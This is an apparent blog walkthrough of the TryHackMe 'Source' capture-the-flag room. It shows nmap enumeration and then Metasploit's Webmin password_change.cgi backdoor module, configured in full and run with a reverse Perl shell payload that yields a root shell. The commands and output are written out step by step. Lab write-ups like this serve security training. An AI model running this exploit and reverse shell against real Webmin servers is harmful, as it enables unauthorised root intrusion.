TryHackMe | Source
This is one (of many) walkthrough for the Source CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article.
Enumeration
As usual, I use nmap to see which ports are open.
$ nmap -sCV $IP-ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-05 16:16 GMT
...
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
| 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (EdDSA)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-server-header: MiniServ/1.890
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 02:7D:26:D8:9A:85 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.15 secondsAcessing the web server took me nowhere. It was just telling me to use another page as the current one was using SSL mode.
This web server is running in SSL mode. Try the URL https://ip-IP-ADDRESS.eu-west-1.compute.internal:10000/ instead.
From the other page we could see that a login page was found. However, no credentials were yet to be found.
As I didn’t almost any information at my disposal, I tried to search for any exploit for Webmin httpd. I tried to use metasploit on my research for potential exploits.
# FROM THM VM
$ msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.3.5-dev- ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 410 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_file_manager_rce 2022-02-26 excellent Yes Webmin File Manager RCE
3 exploit/linux/http/webmin_package_updates_rce 2022-07-26 excellent Yes Webmin Package Updates RCE
4 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
6 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
7 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
From the above output, I could find different exploits for webmin. As some of the exploit required a password to start the exploit and I didn’t have any, I ignored those for the moment being. I tried to use the backdoor as a form of bypassing authentication and accessing the server.
msf6 > use linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > show options
Module options (exploit/linux/http/webmin_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using
-metasploit/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generate
d)
TARGETURI / yes Base path to Webmin
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be a
n address on the local machine or 0.0.0.0 to listen on all addre
sses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
# set all required options
msf6 exploit(linux/http/webmin_backdoor) > set SSL true
msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS IP-ADDRESS
msf6 exploit(linux/http/webmin_backdoor) > set LHOST THM-VM-IP-ADDRESS
After adding all the options required to run the exploit, I hit the exploit command and waited for results to appear.
msf6 exploit(linux/http/webmin_backdoor) > exploit
[*] Started reverse TCP handler on THM-VM-IP-ADDRESS:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened at 2023-03-05 16:42:16 +0000
which python
/usr/bin/python
# create a stable shell
python -c "import pty; pty.spawn('/bin/bash');"
root@source:/usr/share/webmin/# whoami
rootI was not expecting this! 😅 I’m already a root user. I could instantly get the user.txt file and root.txt all together.
Conclusion
This CTF got a bit unexpected. Even though I used the magic of metasploit to retrieve a web shell as root, I got pretty curious about other ways to achieve the same result. From reading other writeups for this CTF, I got pretty happy as they used the same approach to reach the same goal. Kudos to DarkStar7471 to create this one! 👍
